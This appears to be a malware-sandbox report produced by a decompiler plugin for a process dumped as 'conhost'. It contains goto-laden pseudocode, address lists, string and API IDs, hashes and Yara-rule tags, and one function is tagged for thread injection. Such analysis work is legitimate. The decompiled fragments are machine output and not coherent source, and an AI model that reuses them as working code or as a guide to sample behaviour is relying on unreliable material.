				if ( *((long long*)(_t344 + 0x70)) != 0) goto 0x935d1a88;
				 *((long long*)(_t344 + 0x70)) = 0x93602380;
				if ( *0x93602380 == 0) goto 0x935d17e2;
				if ( *((long long*)( *_t497 + 0x70)) == 0) goto 0x935d1be0;
				r12d = 0;
				goto 0x935d1a2a;
				asm("o16 nop [cs:eax+eax]");
				if (0x93602390 == _t518) goto 0x935d17e2;
				if (0x7ff69360238f - _t518 < 0) goto 0x935d17e2;
				_t347 =  *_t497;
				if (_t347 == 0) goto 0x935d1ac8;
				if ( *((long long*)(_t347 + 0x68)) == 0) goto 0x935d1aa8;
				_t348 =  *_t497;
				_t482 = _t518 + 0x7ff69360238f >> 1 << 4;
				if (_t536 ==  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t347 + 0x68)))) + _t482 + 8))) goto 0x935d1bf0;
				if (_t348 == 0) goto 0x935d1af0;
				if ( *((long long*)(_t348 + 0x68)) == 0) goto 0x935d1ab8;
				_t350 =  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x68))));
				if (_t536 -  *((intOrPtr*)(_t350 + _t482 + 8)) < 0) goto 0x935d1a10;
				goto 0x935d1a1d;
				asm("o16 nop [eax+eax]");
				_t351 =  *((intOrPtr*)(_t350 + 0x70));
				goto 0x935d19d6;
				goto 0x935d1934;
				 *((long long*)(_t351 + 0x68)) = 0x93602388;
				goto 0x935d1a49;
				 *((long long*)(_t351 + 0x68)) = 0x93602388;
				goto 0x935d1a72;
				E00007FF67FF6935D6420();
				_t353 =  *_t497;
				if ( *0x7FF6936023F0 == 0) goto 0x935d1aa8;
				if (_t353 != 0) goto 0x935d1a41;
				E00007FF67FF6935D6420();
				goto 0x935d1a41;
				E00007FF67FF6935D6420();
				_t354 =  *_t497;
				if ( *((long long*)(_t353 + 0x68)) == 0) goto 0x935d1ab8;
				if (_t354 != 0) goto 0x935d1a6e;
				E00007FF67FF6935D6420();
				goto 0x935d1a6e;
				E00007FF67FF6935D6420();
				_t355 =  *_t497;
				if ( *((long long*)(_t354 + 0x58)) == 0) goto 0x935d1852;
				if (_t355 != 0) goto 0x935d1910;
				E00007FF67FF6935D6420();
				if ( *((long long*)( *((intOrPtr*)(_t355 + 0x58)))) == 0) goto 0x935d1e6c;
				_t357 =  *_t497;
				if (_t357 != 0) goto 0x935d1867;
				E00007FF67FF6935D6420();
				_t358 =  *_t497;
				if ( *((long long*)(_t357 + 0x58)) == 0) goto 0x935d1872;
				if (_t358 != 0) goto 0x935d1980;
				E00007FF67FF6935D6420();
				_t359 =  *_t497;
				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t358 + 0x58)))) + 0x1d0)) = _t494;
				if (_t359 != 0) goto 0x935d1887;
				E00007FF67FF6935D6420();
				if ( *((long long*)(_t359 + 0x58)) == 0) goto 0x935d19a0;
				if ( *_t497 != 0) goto 0x935d1892;
				E00007FF67FF6935D6420();
				_t361 =  *_t497;
				goto 0x935d1896;
				 *((long long*)(_t361 + 0x50)) = 0x93602398;
				goto 0x935d1954;
				 *((long long*)(_t361 + 0x70)) = 0x93602380;
				goto 0x935d19f3;
				if (_t361 == 0) goto 0x935d205e;
				if ( *((long long*)(_t361 + 0x68)) != 0) goto 0x935d1cc8;
				 *((long long*)(_t361 + 0x68)) = 0x93602388;
				_t412 =  *((intOrPtr*)(_t351 + 0x58)) + 1;
				if ( *((long long*)(_t361 + 0x70)) != 0) goto 0x935d1ee0;
				_t281 =  *0x93602380 - _t412; // 0x1
				 *((long long*)(_t361 + 0x70)) = 0x93602380;
				if (_t281 > 0) goto 0x935d1f62;
				if ( *((long long*)(_t361 + 0x70)) != 0) goto 0x935d1dd0;
				 *((long long*)(_t361 + 0x70)) = 0x93602380;
				 *0x93602380 =  *0x93602380 - 1;
				if ( *((long long*)(_t361 + 0x70)) != 0) goto 0x935d1ed0;
				 *((long long*)(_t361 + 0x70)) = 0x93602380;
				if ( *0x93602380 != 0) goto 0x935d17e2;
				if ( *((long long*)(_t361 + 0x68)) == 0) goto 0x935d201b;
				free(??);
				_t363 =  *_t497;
				if (_t363 == 0) goto 0x935d2077;
				if ( *((long long*)(_t363 + 0x78)) == 0) goto 0x935d200b;
				_t413 =  *((intOrPtr*)(_t363 + 0x78));
				 *_t413 = 0;
				if ( *((long long*)(_t363 + 0x70)) == 0) goto 0x935d1ff8;
				 *((long long*)( *((intOrPtr*)(_t363 + 0x70)))) =  *_t413;
				goto 0x935d17e2;
				if ( *_t497 != 0) goto 0x935d1c0f;
				E00007FF67FF6935D6420();
				_t366 =  *_t497;
				if (_t366 != 0) goto 0x935d1c13;
				E00007FF67FF6935D6420();
				_t367 =  *_t497;
				if ( *((long long*)(_t366 + 0x70)) == 0) goto 0x935d1c1e;
				if (_t367 != 0) goto 0x935d1ee0;
				E00007FF67FF6935D6420();
				_t369 =  *_t497;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t367 + 0x70)))) - _t413 + 1 <= 0) goto 0x935d1f40;
				if (_t369 != 0) goto 0x935d1eed;
				E00007FF67FF6935D6420();
				if ( *((long long*)(_t369 + 0x70)) == 0) goto 0x935d1ef4;
				if ( *_t497 != 0) goto 0x935d1f62;
				E00007FF67FF6935D6420();
				_t372 =  *_t497;
				if (_t372 != 0) goto 0x935d1f09;
				E00007FF67FF6935D6420();
				if ( *((long long*)(_t372 + 0x68)) == 0) goto 0x935d1fe8;
				if ( *_t497 != 0) goto 0x935d1f14;
				E00007FF67FF6935D6420();
				_t375 =  *_t497;
				if (_t375 != 0) goto 0x935d202e;
				E00007FF67FF6935D6420();
				if ( *((long long*)(_t375 + 0x68)) == 0) goto 0x935d2039;
				if ( *_t497 != 0) goto 0x935d1f25;
				E00007FF67FF6935D6420();
				goto 0x935d1f25;
				_t377 =  *_t497;
				if (_t377 == 0) goto 0x935d1f68;
				goto 0x935d1c4c;
				asm("o16 nop [cs:eax+eax]");
				E00007FF67FF6935D6420();
				goto 0x935d18bb;
				asm("o16 nop [eax+eax]");
				E00007FF67FF6935D6420();
				_t378 =  *_t497;
				if ( *((long long*)(_t377 + 0x70)) == 0) goto 0x935d19c8;
				if (_t378 != 0) goto 0x935d1a88;
				E00007FF67FF6935D6420();
				if ( *((long long*)( *((intOrPtr*)(_t378 + 0x70)))) == 0) goto 0x935d17e2;
				_t380 =  *_t497;
				if (_t380 != 0) goto 0x935d19e4;
				E00007FF67FF6935D6420();
				if ( *((long long*)(_t380 + 0x70)) == 0) goto 0x935d1be0;
				if ( *_t497 != 0) goto 0x935d19ef;
				E00007FF67FF6935D6420();
				goto 0x935d19f3;
				_t383 =  *_t497;
				if (_t383 != 0) goto 0x935d191e;
				E00007FF67FF6935D6420();
				_t384 =  *_t497;
				if ( *((long long*)(_t383 + 0x58)) == 0) goto 0x935d1929;
				if (_t384 != 0) goto 0x935d1a98;
				E00007FF67FF6935D6420();
				_t415 =  *((intOrPtr*)(_t384 + 0x58));
				 *_t415 = _t494;
				if ( *_t497 != 0) goto 0x935d1937;
				E00007FF67FF6935D6420();
				_t386 =  *_t497;
				goto 0x935d193f;
				goto 0x935d1c66;
				if (_t415 -  *((intOrPtr*)( *((intOrPtr*)(_t386 + 0x70)))) >= 0) goto 0x935d1c36;
				if ( *((long long*)(_t386 + 0x70)) != 0) goto 0x935d1f62;
				 *((long long*)(_t386 + 0x70)) = 0x93602380;
				if ( *((long long*)(_t386 + 0x68)) == 0) goto 0x935d1fe8;
				_t436 =  *((intOrPtr*)( *((intOrPtr*)(_t386 + 0x68)))) + (_t415 << 4) - 0x10;
				memcpy(??, ??, ??);
				_t389 =  *_t497;
				if (_t389 != 0) goto 0x935d1c36;
				E00007FF67FF6935D6420();
				if ( *((long long*)(_t389 + 0x70)) != 0) goto 0x935d1dd0;
				goto 0x935d1c41;
				goto 0x935d1eff;
				E00007FF67FF6935D6420();
				_t391 =  *_t497;
				 *((long long*)( *((intOrPtr*)( *_t497 + 0x70)))) =  *((long long*)( *((intOrPtr*)( *_t497 + 0x70)))) - 1;
				if (_t391 != 0) goto 0x935d1c50;
				E00007FF67FF6935D6420();
				_t392 =  *_t497;
				if ( *((long long*)(_t391 + 0x70)) == 0) goto 0x935d1c5b;
				if (_t392 != 0) goto 0x935d1ed0;
				E00007FF67FF6935D6420();
				if ( *((long long*)( *((intOrPtr*)(_t392 + 0x70)))) != 0) goto 0x935d17e2;
				_t394 =  *_t497;
				if (_t394 != 0) goto 0x935d1c70;
				E00007FF67FF6935D6420();
				_t395 =  *_t497;
				if ( *((long long*)(_t394 + 0x68)) == 0) goto 0x935d201b;
				if (_t395 != 0) goto 0x935d1c7b;
				E00007FF67FF6935D6420();
				goto 0x935d1c7b;
				 *((long long*)(_t395 + 0x68)) = 0x93602388;
				goto 0x935d1f18;
				 *((long long*)(_t395 + 0x70)) = 0x93602380;
				goto 0x935d1cb9;
				 *0x7FF6936023F8 = 0x93602378;
				goto 0x935d1ca3;
				 *0x7FF6936023E8 = 0x93602388;
				goto 0x935d1c7f;
				if ( *((long long*)(0x7ff6936023f0)) != 0) goto 0x935d1f25;
				 *((long long*)(0x7ff6936023f0)) = 0x93602388;
				goto 0x935d1f29;
				E00007FF67FF6935D6420();
				goto 0x935d1954;
				E00007FF67FF6935D6420();
				if ( *((long long*)( *_t497 + 0x68)) != 0) goto 0x935d1cc8;
				goto 0x935d1c04;
				E00007FF67FF6935D6420();
				_t401 =  *_t497;
				if ( *((long long*)( *_t497 + 0x78)) == 0) goto 0x935d200b;
				if (_t401 != 0) goto 0x935d1c9f;
				E00007FF67FF6935D6420();
				_t402 =  *_t497;
				 *((long long*)( *((intOrPtr*)(_t401 + 0x78)))) = 0;
				if (_t402 != 0) goto 0x935d1caa;
				E00007FF67FF6935D6420();
				if ( *((long long*)(_t402 + 0x70)) == 0) goto 0x935d1ff8;
				if ( *_t497 != 0) goto 0x935d1cb5;
				_t206 = E00007FF67FF6935D6420();
				goto 0x935d1cb5;
				asm("o16 nop [eax+eax]");
				if (_t436 == 0) goto 0x935d20ef;
				if ( *((long long*)(_t436 + 0x1d0)) == 0) goto 0x935d20f0;
				return _t206;
			}











































































                        0x7ff6935d15e0
                        0x7ff6935d15fb
                        0x7ff6935d160a
                        0x7ff6935d1619
                        0x7ff6935d1628
                        0x7ff6935d162f
                        0x7ff6935d1636
                        0x7ff6935d163b
                        0x7ff6935d1644
                        0x7ff6935d164d
                        0x7ff6935d1656
                        0x7ff6935d165f
                        0x7ff6935d1668
                        0x7ff6935d1671
                        0x7ff6935d167d
                        0x7ff6935d1685
                        0x7ff6935d168d
                        0x7ff6935d1698
                        0x7ff6935d16a0
                        0x7ff6935d16ab
                        0x7ff6935d16b7
                        0x7ff6935d16c8
                        0x7ff6935d16d1
                        0x7ff6935d16d6
                        0x7ff6935d16dd
                        0x7ff6935d16e2
                        0x7ff6935d16e7
                        0x7ff6935d16ed
                        0x7ff6935d1701
                        0x7ff6935d1703
                        0x7ff6935d171a
                        0x7ff6935d171d
                        0x7ff6935d172c
                        0x7ff6935d1731
                        0x7ff6935d1735
                        0x7ff6935d1737
                        0x7ff6935d173c
                        0x7ff6935d1745
                        0x7ff6935d1751
                        0x7ff6935d1752
                        0x7ff6935d1753
                        0x7ff6935d1755
                        0x7ff6935d1757
                        0x7ff6935d1763
                        0x7ff6935d176a
                        0x7ff6935d1770
                        0x7ff6935d1780
                        0x7ff6935d1785
                        0x7ff6935d1787
                        0x7ff6935d17a0
                        0x7ff6935d17a7
                        0x7ff6935d17b1
                        0x7ff6935d17bc
                        0x7ff6935d17c9
                        0x7ff6935d17cd
                        0x7ff6935d17dc
                        0x7ff6935d17e9
                        0x7ff6935d17eb
                        0x7ff6935d17f7
                        0x7ff6935d17f9
                        0x7ff6935d1805
                        0x7ff6935d1807
                        0x7ff6935d1815
                        0x7ff6935d181c
                        0x7ff6935d1837
                        0x7ff6935d183a
                        0x7ff6935d1841
                        0x7ff6935d184c
                        0x7ff6935d1859
                        0x7ff6935d1861
                        0x7ff6935d186c
                        0x7ff6935d1879
                        0x7ff6935d1880
                        0x7ff6935d188c
                        0x7ff6935d1896
                        0x7ff6935d189c
                        0x7ff6935d18a7
                        0x7ff6935d18ac
                        0x7ff6935d18b5
                        0x7ff6935d18c4
                        0x7ff6935d18c6
                        0x7ff6935d18c7
                        0x7ff6935d18cb
                        0x7ff6935d18cf
                        0x7ff6935d18d8
                        0x7ff6935d18e2
                        0x7ff6935d18e6
                        0x7ff6935d18ef
                        0x7ff6935d18f1
                        0x7ff6935d18f6
                        0x7ff6935d1904
                        0x7ff6935d1918
                        0x7ff6935d1923
                        0x7ff6935d1930
                        0x7ff6935d1934
                        0x7ff6935d1941
                        0x7ff6935d194a
                        0x7ff6935d1957
                        0x7ff6935d195d
                        0x7ff6935d1963
                        0x7ff6935d196d
                        0x7ff6935d1974
                        0x7ff6935d1984
                        0x7ff6935d1990
                        0x7ff6935d1994
                        0x7ff6935d19a7
                        0x7ff6935d19ab
                        0x7ff6935d19b0
                        0x7ff6935d19b7
                        0x7ff6935d19c2
                        0x7ff6935d19cf
                        0x7ff6935d19da
                        0x7ff6935d19e9
                        0x7ff6935d19f6
                        0x7ff6935d1a04
                        0x7ff6935d1a06
                        0x7ff6935d1a13
                        0x7ff6935d1a20
                        0x7ff6935d1a26
                        0x7ff6935d1a34
                        0x7ff6935d1a3f
                        0x7ff6935d1a45
                        0x7ff6935d1a4f
                        0x7ff6935d1a58
                        0x7ff6935d1a61
                        0x7ff6935d1a6c
                        0x7ff6935d1a72
                        0x7ff6935d1a7a
                        0x7ff6935d1a80
                        0x7ff6935d1a82
                        0x7ff6935d1a88
                        0x7ff6935d1a8c
                        0x7ff6935d1a9c
                        0x7ff6935d1aa8
                        0x7ff6935d1aaf
                        0x7ff6935d1ab8
                        0x7ff6935d1abf
                        0x7ff6935d1ac8
                        0x7ff6935d1ad2
                        0x7ff6935d1ad6
                        0x7ff6935d1adb
                        0x7ff6935d1ae1
                        0x7ff6935d1ae6
                        0x7ff6935d1af0
                        0x7ff6935d1afa
                        0x7ff6935d1afe
                        0x7ff6935d1b03
                        0x7ff6935d1b09
                        0x7ff6935d1b0e
                        0x7ff6935d1b18
                        0x7ff6935d1b20
                        0x7ff6935d1b29
                        0x7ff6935d1b32
                        0x7ff6935d1b38
                        0x7ff6935d1b45
                        0x7ff6935d1b4b
                        0x7ff6935d1b52
                        0x7ff6935d1b58
                        0x7ff6935d1b60
                        0x7ff6935d1b69
                        0x7ff6935d1b72
                        0x7ff6935d1b78
                        0x7ff6935d1b80
                        0x7ff6935d1b8b
                        0x7ff6935d1b95
                        0x7ff6935d1b9b
                        0x7ff6935d1bac
                        0x7ff6935d1bb5
                        0x7ff6935d1bbb
                        0x7ff6935d1bc4
                        0x7ff6935d1bc8
                        0x7ff6935d1bd4
                        0x7ff6935d1bd8
                        0x7ff6935d1be7
                        0x7ff6935d1beb
                        0x7ff6935d1bf3
                        0x7ff6935d1bfe
                        0x7ff6935d1c0b
                        0x7ff6935d1c0f
                        0x7ff6935d1c18
                        0x7ff6935d1c25
                        0x7ff6935d1c2c
                        0x7ff6935d1c30
                        0x7ff6935d1c3b
                        0x7ff6935d1c48
                        0x7ff6935d1c4c
                        0x7ff6935d1c55
                        0x7ff6935d1c62
                        0x7ff6935d1c6a
                        0x7ff6935d1c75
                        0x7ff6935d1c82
                        0x7ff6935d1c87
                        0x7ff6935d1c8e
                        0x7ff6935d1c99
                        0x7ff6935d1c9f
                        0x7ff6935d1ca3
                        0x7ff6935d1caf
                        0x7ff6935d1cbc
                        0x7ff6935d1cbf
                        0x7ff6935d1ccf
                        0x7ff6935d1cd5
                        0x7ff6935d1cda
                        0x7ff6935d1ce5
                        0x7ff6935d1ceb
                        0x7ff6935d1cf5
                        0x7ff6935d1cf9
                        0x7ff6935d1d02
                        0x7ff6935d1d08
                        0x7ff6935d1d14
                        0x7ff6935d1d18
                        0x7ff6935d1d28
                        0x7ff6935d1d2e
                        0x7ff6935d1d3c
                        0x7ff6935d1d45
                        0x7ff6935d1d4b
                        0x7ff6935d1d57
                        0x7ff6935d1d65
                        0x7ff6935d1d6b
                        0x7ff6935d1d79
                        0x7ff6935d1d82
                        0x7ff6935d1d88
                        0x7ff6935d1d94
                        0x7ff6935d1d9e
                        0x7ff6935d1da4
                        0x7ff6935d1db2
                        0x7ff6935d1dbb
                        0x7ff6935d1dc1
                        0x7ff6935d1dc6
                        0x7ff6935d1dd0
                        0x7ff6935d1dd7
                        0x7ff6935d1de1
                        0x7ff6935d1de6
                        0x7ff6935d1df0
                        0x7ff6935d1df5
                        0x7ff6935d1dfa
                        0x7ff6935d1e00
                        0x7ff6935d1e0a
                        0x7ff6935d1e0e
                        0x7ff6935d1e17
                        0x7ff6935d1e1d
                        0x7ff6935d1e2a
                        0x7ff6935d1e30
                        0x7ff6935d1e37
                        0x7ff6935d1e3d
                        0x7ff6935d1e4b
                        0x7ff6935d1e54
                        0x7ff6935d1e5a
                        0x7ff6935d1e67
                        0x7ff6935d1e6c
                        0x7ff6935d1e73
                        0x7ff6935d1e79
                        0x7ff6935d1e81
                        0x7ff6935d1e8a
                        0x7ff6935d1e93
                        0x7ff6935d1e99
                        0x7ff6935d1e9e
                        0x7ff6935d1ea6
                        0x7ff6935d1eac
                        0x7ff6935d1eb2
                        0x7ff6935d1ebc
                        0x7ff6935d1ec3
                        0x7ff6935d1ed4
                        0x7ff6935d1ee7
                        0x7ff6935d1ef2
                        0x7ff6935d1efb
                        0x7ff6935d1f0e
                        0x7ff6935d1f32
                        0x7ff6935d1f37
                        0x7ff6935d1f3c
                        0x7ff6935d1f43
                        0x7ff6935d1f49
                        0x7ff6935d1f53
                        0x7ff6935d1f5d
                        0x7ff6935d1f66
                        0x7ff6935d1f68
                        0x7ff6935d1f71
                        0x7ff6935d1f75
                        0x7ff6935d1f7c
                        0x7ff6935d1f82
                        0x7ff6935d1f8a
                        0x7ff6935d1f93
                        0x7ff6935d1f9c
                        0x7ff6935d1fa2
                        0x7ff6935d1faf
                        0x7ff6935d1fb5
                        0x7ff6935d1fbc
                        0x7ff6935d1fc2
                        0x7ff6935d1fca
                        0x7ff6935d1fd3
                        0x7ff6935d1fd8
                        0x7ff6935d1fde
                        0x7ff6935d1fe3
                        0x7ff6935d1fef
                        0x7ff6935d1ff3
                        0x7ff6935d1fff
                        0x7ff6935d2006
                        0x7ff6935d2012
                        0x7ff6935d2016
                        0x7ff6935d2022
                        0x7ff6935d2029
                        0x7ff6935d2033
                        0x7ff6935d2040
                        0x7ff6935d2047
                        0x7ff6935d204c
                        0x7ff6935d2059
                        0x7ff6935d205e
                        0x7ff6935d2068
                        0x7ff6935d2072
                        0x7ff6935d2077
                        0x7ff6935d207f
                        0x7ff6935d2088
                        0x7ff6935d208d
                        0x7ff6935d2093
                        0x7ff6935d209c
                        0x7ff6935d20a0
                        0x7ff6935d20aa
                        0x7ff6935d20b0
                        0x7ff6935d20c1
                        0x7ff6935d20ca
                        0x7ff6935d20d0
                        0x7ff6935d20d5
                        0x7ff6935d20da
                        0x7ff6935d20e3
                        0x7ff6935d20ed
                        0x7ff6935d20ef

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CurrentDebugOutputStringThread_ultoaabort
                        • String ID: Error cl$eaning u$eys for $p spin_k$thread
                        • API String ID: 4191895893-3545615192
                        • Opcode ID: 012689f9b7db33477ca97de5f6ef891ae3b3c648869c40152f51c26263e8cba6
                        • Instruction ID: a49cc1e009a6780943fd29956b3cc146bc728be392d276d95d0fbfdeaf2a59c1
                        • Opcode Fuzzy Hash: 012689f9b7db33477ca97de5f6ef891ae3b3c648869c40152f51c26263e8cba6
                        • Instruction Fuzzy Hash: 3121837260CB8081E7708B55F04531AB6E5F785384F148179E2CD97B98DF7DD504CB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CEB10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60synchronizationCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CloseHandleMutex$AtomCreateFindObjectReleaseSingleWait
                        • String ID: failed to to lock cleanup mutex
                        • API String ID: 3776795807-674698732
                        • Opcode ID: c41f3614338bd67209c4f7cd0a41d0fef92aab0ddd0eaf74ed2eaac13ba6a58c
                        • Instruction ID: faba44c25b2ca1612a52159da73db79d54bfca5778710a8734197fe4aeb04fdf
                        • Opcode Fuzzy Hash: c41f3614338bd67209c4f7cd0a41d0fef92aab0ddd0eaf74ed2eaac13ba6a58c
                        • Instruction Fuzzy Hash: F6214870A1A64781FE759B52D85713923A8FF48B8AB54C4B5C81EEB3A0DE3CE445D310
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935ED220 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 196COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy
                        • String ID: basic_string::_M_replace
                        • API String ID: 3510742995-2323331477
                        • Opcode ID: 7ba4b62b8074935b880a2fc299f9cc81f54d40f28926a9126008e9d36fadf55d
                        • Instruction ID: 33cc2c934efab0e0c4e70f0c49424e6ee73fc1a1697b6a61e69de3b4693d02d0
                        • Opcode Fuzzy Hash: 7ba4b62b8074935b880a2fc299f9cc81f54d40f28926a9126008e9d36fadf55d
                        • Instruction Fuzzy Hash: 95711463A09BA6B5EA30DF55C0020BDA298EB4CB94F854172DE1EB77D0EE7CE441C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935EA150 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 185COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy
                        • String ID: basic_string::_M_replace
                        • API String ID: 3510742995-2323331477
                        • Opcode ID: 703bcf74803a35d7be1c8add41b38c1281bf63d06090e26a57235d4faad9da79
                        • Instruction ID: d2260fad01da1cdd4a588989715db954b3591fa6242f554d1ccb6f474fda99ba
                        • Opcode Fuzzy Hash: 703bcf74803a35d7be1c8add41b38c1281bf63d06090e26a57235d4faad9da79
                        • Instruction Fuzzy Hash: 9E613622E0D7D661E931AA7590022BC6A5CEF0EB80F4981B2CE5EB77C2ED2DD441C312
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D4EA0 Relevance: 13.7, APIs: 9, Instructions: 182threadinjectionsynchronizationCOMMON
                        Download Yara Rule
                        C-Code - Quality: 53%
                        			E00007FF67FF6935D4EA0(void* __ecx, void* __edi, void* __rax, void* __rcx) {
				char _v1272;
				signed int _t18;
				void* _t39;
				void* _t40;
				void* _t42;
				intOrPtr _t50;
				void* _t51;
				intOrPtr* _t52;

				_t39 = __rax;
				_t51 = __rcx;
				E00007FF67FF6935D2550(__edi, __rcx);
				_t42 = _t39;
				if (_t39 == 0) goto 0x935d4f8e;
				_t40 =  *((intOrPtr*)(_t39 + 0x28)) - 1;
				if (_t40 - 0xfffffffd > 0) goto 0x935d4f8e;
				if (GetHandleInformation(??, ??) == 0) goto 0x935d4f8e;
				_t4 = _t42 + 0x38; // 0x38
				E00007FF67FF6935CF8A0(_t4);
				E00007FF67FF6935D2100(__ecx,  &_v1272);
				if (_t40 == 0) goto 0x935d50e0;
				_t18 =  *(_t42 + 0x40) & 0x000000ff;
				if (_t51 ==  *((intOrPtr*)(_t40 + 0x1d8))) goto 0x935d5060;
				if (( *(_t42 + 0x44) & 0x00000003) == 3) goto 0x935d4fa8;
				if ((_t18 & 0x00000003) != 0) goto 0x935d4f80;
				_t52 =  *0x935f8900; // 0x7ff6936023e0
				_t50 =  *_t52;
				 *(_t42 + 0x40) = _t18 & 0xfffffffc | 0x00000001;
				if (_t50 == 0) goto 0x935d5110;
				if ( *((long long*)(_t50 + 0x18)) == 0) goto 0x935d50f0;
				asm("lock add dword [eax], 0x1");
				if ( *((intOrPtr*)(_t42 + 0x30)) == 0) goto 0x935d4f68;
				SetEvent(??);
				E00007FF67FF6935CFBC0(_t4);
				return 0;
			}











                        0x7ff6935d4ea0
                        0x7ff6935d4ead
                        0x7ff6935d4eb0
                        0x7ff6935d4eb5
                        0x7ff6935d4ebb
                        0x7ff6935d4ec5
                        0x7ff6935d4ecd
                        0x7ff6935d4ee3
                        0x7ff6935d4ee9
                        0x7ff6935d4ef0
                        0x7ff6935d4ef5
                        0x7ff6935d4efd
                        0x7ff6935d4f0a
                        0x7ff6935d4f11
                        0x7ff6935d4f20
                        0x7ff6935d4f28
                        0x7ff6935d4f2a
                        0x7ff6935d4f37
                        0x7ff6935d4f3a
                        0x7ff6935d4f40
                        0x7ff6935d4f4b
                        0x7ff6935d4f55
                        0x7ff6935d4f60
                        0x7ff6935d4f62
                        0x7ff6935d4f6b
                        0x7ff6935d4f7f

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
